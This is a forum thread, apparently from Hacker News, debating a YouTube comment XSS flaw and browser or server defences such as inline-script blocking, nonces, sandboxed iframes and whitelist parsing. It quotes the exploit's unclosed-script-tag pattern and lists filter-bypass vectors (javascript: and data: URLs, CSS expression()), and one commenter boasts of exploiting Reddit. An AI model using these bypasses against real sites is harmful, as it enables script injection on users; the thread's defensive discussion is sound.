XSS is such a huge deal and yet I don't understand why browser makers/w3c etc. haven't agreed on any solutions yet.
a. Have a meta-tag (or something in the <head>) that says: do not allow in-line script tags on this page. Only run scripts from external .js files. No onclick/onmouse code allowed in HTML.
b. Have a <noscript_within> tag that tells browsers to completely ignore all in-line script tags (including onclick code) within the tag. That way sites can allow all HTML within the <noscript_within><div id="comments">....</div></noscript_within>
NoScript sounds like a better and better option these days. I already use FlashBlock to protect against 0-day Flash vulnerabilities.
a. That would barely mitigate the problem; it might stop some of the goofy alert() hacks from people messing around, but the others are just going to use the exploit to include an external .js file. Even if your meta-tag would require all JS code to be in the <HEAD>, someone could have used this exploit to create an iFrame which then contained the JS. Or create a meta-refresh tag that redirects to the page with the exploit. The possibilities are endless.
b. If someone figures out how to break the character escape jail, then they're going to be able to write a </noscript_within> tag.
If a user can do an alert(), they can pretty much do anything. JS has no security-levels except domain restrictions.
> someone could have used this exploit to create an iFrame
But this exploit wouldn't even run. My browser would only run JS on youtube.com from external JS files. YouTube devs could put <script> within their php pages and it would do nothing, let alone random users putting <script> tags in comments. Only way to run ANY JS on youtube.com would be to load an external .js file. If this meta-tag was present, you cannot load an external JS file unless it was defined in the <head>. I really fail to see a way to break out of this shell. Adding a <script>, <meta>, <link>, <head> tag below the initial <head></head> would not work if this mode was turned on. Well-designed sites don't add meta/link tags outside of the <head> anyway. So I don't think it is asking for too much.
> If someone figures out how to break the character escape jail
I agree but that is almost certainly preventable. Right now, JS can be introduced via so many ways (<script>, on-events, javascript:) and web devs have to protect against all of them. I remember in one of the MySpace XSS attacks, IE allowed "<scri\npt>" to execute despite the new-line. Browsers will look for string <noscript_within> as start and </noscript_within> as end. So will web-devs. No partial-lines, no attributes, no nothing. RegEx doesn't fail.
The point I'm making is that it's not as easy of a problem to resolve as you are claiming. The problem is that - as you said - there are so many different XSS vectors in the browser; if you patch one specific use case then the exploiter will just find another. Browser developers aren't avoiding this problem; they just realize how complicated it is and have to approach it slowly to do it right, and to not break compatibility.
Your <noscript_within> tag is something that I'm sure every browser developer (and web app developer) has thought up at some point. It does not resolve this problem. It would only protect a site in the case that a website allowed all user input to be passed directly onto the page unedited. Your solution would require app developers to allow commenters the full range of HTML (including blink, marquee, and who knows what else) in their comments. Because once the app developer starts to try to filter the commenter's input, he's opening himself up to an exploit that allows the filtered output to contain a </noscript_within> tag.
The simplest example would be an app developer who simply deleted all <marquee> tags because he/she wanted to disallow marquees. The script kiddie would just insert </noscript_<marquee>within> into his comment.
The more complicated examples would be things that neither you nor I have thought of yet.
That doesn't even take into account the exploit of users in legacy web apps who could potentially start passing in unclosed <noscript_within> tags (in apps which allow HTML but filter only certain tags) to disable legitimate JS later in the page, breaking the apps. Of course, it would be possible to only enable <noscript_within> based on doctype or something else, but then it's certain that some web developers will accidentally forget to do so and leave their app open to abuse.
You are oversimplifying the problem. I am sure that a solution exists and XSS will eventually become a problem of the past, but the solution will be more complicated than you claim it would be.
Forget (b). I get that it may not be perfect. Why do you think (a) wouldn't work? It is as simple as disabling JS on the HTML pages. That works on all browsers already. Let's keep that + enable JS from .js files. I understand it is more complex than I'm making it out to be but isn't that better than XSS error on the world's largest sites?
The implementation of a) would be extremely complex from both a web developer and browser development viewpoint.
From the web developer perspective: It's very hard to use JS without putting at least some javascript in the HTML. Loading js files is not very useful if there's no means to actually activate any of the functionality of those files.
In order for your idea to work, you'd have to completely strip all HTML of anything that can reference or activate javascript: not just mouseover, but also href="javascript:xxxx()" as well. That means that the only way you could actually use javascript on a page would be to create a function that would be loaded by body_onload to add event listeners and other attributes through DOM manipulation. It would make web development so convoluted that I doubt that you'd succeed in convincing w3c or anyone else to adopt it.
I think the right approach has to maintain the workflow and functionality of web development. tptacek posted an idea in the other thread that sounds like it would reduce the number of attack vectors without causing too much difficulty to the developer: include a nonce in the header and require script tags to include that nonce.
People have been focusing on the noscript tag, but I rather like the idea of something in the head that disables all javascript in body. One good idea is perhaps better than one good idea followed by one bad idea, especially when the history is already full of so many horrible ideas that got into the spec. ;)
But there's also already something in html5; the iframe sandbox attribute. Among other things it can be used to disallow scripts to run in an iframe. You can read about it here. Amusingly, they suggest it may be available for widespread use in 10 years. http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox
> One good idea is perhaps better than one good idea followed by one bad idea
Haha. I'm sure both ideas have been proposed by many people over the years. I have definitely heard of (b) from many others. I haven't heard of anyone else mentioning (a) yet. I'm kinda surprised that everyone keeps arguing against (b) while saying nothing about why (a) won't work.
I believe that I and others have mentioned objections that would include (a).
1. Take any given browser-based security check. A server that cares about security could do it, as a last step, instead without waiting for a hypothetical browser that would do the step. Worried about scripting in the body, strip script or whatever tags off as your last step. Sure, you could do it wrong but so could the browser. This wouldn't solve client security problems but that is the client's problem - it should be the clients problem. Some of the clients running in a large site are going to be compromised and the site has to deal with that separately from its own potential use as a vector for infection.
2. Take away the sites that care about security and ... you're left with the sites that don't care about security. And with these, even if you add the browser-side security, the uncaring sites would still be there and vulnerable.
Sure, this division might be a little simplistic and you could cook up an argument for script signing but it still doesn't make sense to me. Implementing security in a single reliable place, your site, seems inherently better than implementing it across multiple domains you don't control. Microsoft's signed applets were a failure back in the day as I recall. Indeed, if you need something totally secure, why not try Java applets? They've already implemented inherently secure. (Java applets were not perfectly secure but at security was in Java to begin with, so it will always be much stronger than Javascript ... but we have think why Java applets were much less sucessful than Ajax applications).
Probably the best method for this is giving the amount of characters are in the <noscript_within> tag. I don't believe this would break caching, as the length only changes when the content changes.
Until someone writes </noscript_within > or < /noscript_within> and your script doesn't catch it but the browser accepts it. Or one of hundreds of other small details that neither one of us has thought of yet.
That's why browser makers have to agree on the acceptable usage and suggest what web devs should search/for and sanitize. Right now, browser makers do not recommend anything except "sanitize your input" and that means something completely different for each browser.
Yes, every single XSS vulnerability is pretty easy to fix on its own. The problem is that you'll never get all of them across browsers.
It's time that browser makers went back to the drawing board and came up with a base security model to cut the fat away from the basic attack footprint. Some drastic limit on the source of executable JS files, specified in an HTTP header, could be very effective.
> It's time that browser makers went back to the drawing board and came up with a base security model to cut the fat away from the basic attack footprint. Some drastic limit on the source of executable JS files, specified in an HTTP header, could be very effective.
Absolutely! I'm just surprised that so many people here are against any changes to the browsers while expecting that every single developer in the world ensure there's not one bug in their code.
This isn't the same thing as PHP's safe_mode that never really worked as excepted. This is more like crossdomain.xml file. It is something browser makers can proactively do to improve security. Sure, web developers should keep sanitizing inputs as much as possible. And browsers should try to prevent XSS as much as possible. Why can't both work together? Why is it only the developers' problem?
I don't think people are against changes to the browsers. I think they just realize that there are many different browsers out there that each do things slightly differently. If you've ever tried to get CSS working for all possible browsers, you've probably come across cases where it works in some browsers, but not others (I'm looking at you IE6), and you have to use a hack to get it to work.
Changes to browser standards occur at a much slower rate than changes to your code. Politics, competition, and disagreements on standards often get in the way. Just look at all the controversy over the HTML 5 video codec.
Unless browser makers, by some miracle, agree on a common standard for browser security, there are always going to be little idiosyncrasies that occur from browser version to browser version. Just because it's secure in all the browsers you tested, doesn't mean that it's secure in the browsers you didn't test.
The best solution as of right now is to develop ways of writing more secure code, with less potential for human error.
It's not rocket science. Escaping HTML properly is a good start. Not just "Oh yeah we better disallow any <script> tags". I mean properly, escape every single character so that there is absolutely no possible way that anything can be interpreted as anything but a literal character to be displayed.
<noscript_within> sounds like a good solution if you have no idea how to properly escape html.
If you want to be extra sure, just send the data as JSON and build it out in the DOM as createTextNode so you're sure it's actually text and nothing else.
From Reddit:
>> All you need is: <script><script>PAYLOAD
>> Any HTML after the second non-closed script tag survives unescaped.
>> YouTube escapes the first script tag and not the second.
This isn't "XSS attacks are inevitable and so hard to defend against". This is "WTF are you thinking youtube? Did you get a 12 year old to code your comment parsing code?"
I know. But it isn't cakewalk either when you take Unicode/UTF etc. into consideration. Myspace, Twitter, Facebook, and now YouTube have been bitten by it, some multiple times. My point is, with so much social content being user-generated, there is absolutely no way to wall-off the user-content easily. You have to manually make sure every piece of user data is parsed and filtered, and most developers do that but it's not easy.
Show me the code that allows users to enter basic HTML (<a>, <b>, <p>, <u>) while preventing the bad stuff (<script>, <body>). Now make this code allow <a> to have attributes like href, title but not onclick, onmouseout. Allow <p> to have style attributes for font-family but not width:expression(400 + "px") style because that's another way to run JS in IE. You'll quickly see how it gets difficult really quick.
The solution for most sites (including reddit/HN) is to use Markdown. It's not a perfect solution but it works for sites where data entry is restricted to a few fields. YouTube is so large and has so many places where users can enter arbitrary data that it is not simple to ensure there are no bugs anywhere.
Again, I don't understand how my solution (a) fails in preventing all XSS hacks that we've seen so far. Each hack worked because users could insert JS code into a form that was not properly filtered. What is harder? Making sure every single web form on the Internet has 0 sanitization bugs or adding a single meta-tag to top browsers that says "Hey, don't run any inline JS."
b) Look for <a> tags, grab their href attribute, escape it, and insert them as <a href='$1'>$2</a>.
c) Do the same for <b>, <p>, etc.
How would that be vulnerable to XSS? A small whitelist of HTML would be replaced safely, and any script tags and so on would be escaped and displayed as is.
In your example above, $1 may contain javascript. The easy way is href="data:text/javascript", or even href="javascript:alert('foo')"", but there are probably a dozen other ways, including data:image/svg.
There's no real way to "escape" url attributes (some browsers are known to run 'any: ex' as javascript); parsing the url seems to be the only approach that works.
>> "show me the code that allows users to enter basic HTML (<a>, <b>, <p>, <u>) while preventing the bad stuff (<script>, <body>)."
1. Disallow everything. Escape everything 100%.
2. Now selectively parse out the original and recreate what is explicitly allowed. Do not include anything from the input in the code portions of the output that hasn't been completely sanitized.
This isn't a hard problem. It's like asking "Make a firewall that allows mysql through and ssh, but nothing else". The thing is, people make mistakes, and developers are often lazy.
>> "Making sure every single web form on the Internet has 0 sanitization bugs or adding a single meta-tag to top browsers that says "Hey, don't run any inline JS."
Asking the browser to do your security for you seems pretty lazy. If you can't manage to escape HTML properly, what other security issues are there likely to be that the browser can't help with? SQL injections?
> selectively parse out the original and recreate what is explicitly allowed.
This is the ONLY solution. trying to blacklist and escape characters is ultimately trying to push your parsing problem down to the browser, and what will you do when the browser contains a bug that someone can exploit to steal your own credentials on the web app?
I'm a strong believer in using JS to inject unsafe text directly into the DOM. If you want people to mark stuff up, give them a markup language that you parse. Note that Markdown has its issues: If you use a library to parse it, be aware that html is valid markdown, so you're just moving the HTML escape problem around.
If this kind of filtering was possible for a browser to do after receiving the input, it would be possible for the server to do to it's output before it sent that output to the browser.
IF this signing this was a solution, a given server could immediately solve its problem by doing this - at the cost of some processing time.
And if a given server wasn't interested in solving the problem now, they might not implement the solution even if it was implemented in some portion of the browsers out there - indeed, why would any server bother to implement a security protocol which didn't nail every exit (there would always be browsers which didn't follow the new signing protocol. Youtube could patch its problem immediately or wait a decade or two for your solution to happen...).
Not sure about <noscript_within> going all the way to the browser -- but it might be useful as a directive to a front-end reverse-proxy, working a little like an edge-side-include but telling it to strip stray SCRIPTs, that would provide a last line of defense against.
Not elegant, but perhaps by providing a separate independent layer of enforcement could prove worthwhile.
Still, there's the problem of having app developers rigorously declare the SCRIPT-suppressed regions. So perhaps instead the sense should be reversed: require app-designers to rigorously declare only those narrow areas where SCRIPTs are allowed -- with everything else stripped out (and logged as anomalous) by the bastion-proxy.
I've read your idea before and while I have absolutely no technical issues with it, I think it requires a lot more work from everyone involved. The only use for inline scripts at the end of a webpage (right before the </body> tag) that I can think of are analytics/user-tracking scripts. Other than that, I don't see why the JS code couldn't be included in a .js file. And since JS code from .js files can load the analytics files (albeit in a different order than inline script tags), I think my (a) approach would be sufficient for the purpose of blocking XSS.
Your proposal only closes a few possible holes. This is worse than nothing, because it creates a false sense of security.
The reason is that JavaScript code trusts the DOM in many and varied ways, and can thereby be tricked into doing unexpected things by plain HTML code. Consider a page using a calendar.js plug-in, and a user-provided element '<div class="calendar" month="13">...</div>'. This could easily result in JavaScript code being configured with hostile parameters and event handlers being bound to hostile elements.
The only way to handle complex user-provided input is to start with a blank slate, parse the input completely, and only create output that is proven safe.
Google's official statement:
"We took swift action to fix a cross-site scripting (XSS) vulnerability on youtube.com that was discovered several hours ago. Comments were temporarily hidden by default within an hour, and we released a complete fix for the issue in about two hours. We’re continuing to study the vulnerability to help prevent similar issues in the future."
http://techie-buzz.com/online-security/youtube-hack-update.h...
To make things even worse, those bloody 4chaners are already aware of it.
http://boards.4chan.org/b/res/247794166 (Warning: That page triggered several alerts for drive-by malware downloads (Kaspersky))
Don't waste your time linking directly to 4chan posts, especially on high traffic boards like /b/. It only keeps a certain number of threads up at one time, ones that stop being replied to will scroll off the end of the queue and be nuked.
One thing I find interesting about youtube's response is they are reportedly going in and removing <script> tags from already posted comments. So.. do this mean they sanitize comments at post time, rather than at display time?
When I did this same shit to Reddit a year ago (during the time they were doing it to Sears whilst crying 'I'm being oppressed!) they all called me an asshole.
Now it's because everyone at Google sucks, and this is some unforgivable sin on the content providers behalf, not the jerk users who are exploiting it.
a. Have a meta-tag (or something in the <head>) that says: do not allow in-line script tags on this page. Only run scripts from external .js files. No onclick/onmouse code allowed in HTML.
b. Have a <noscript_within> tag that tells browsers to completely ignore all in-line script tags (including onclick code) within the tag. That way sites can allow all HTML within the <noscript_within><div id="comments">....</div></noscript_within>
NoScript sounds like a better and better option these days. I already use FlashBlock to protect against 0-day Flash vulnerabilities.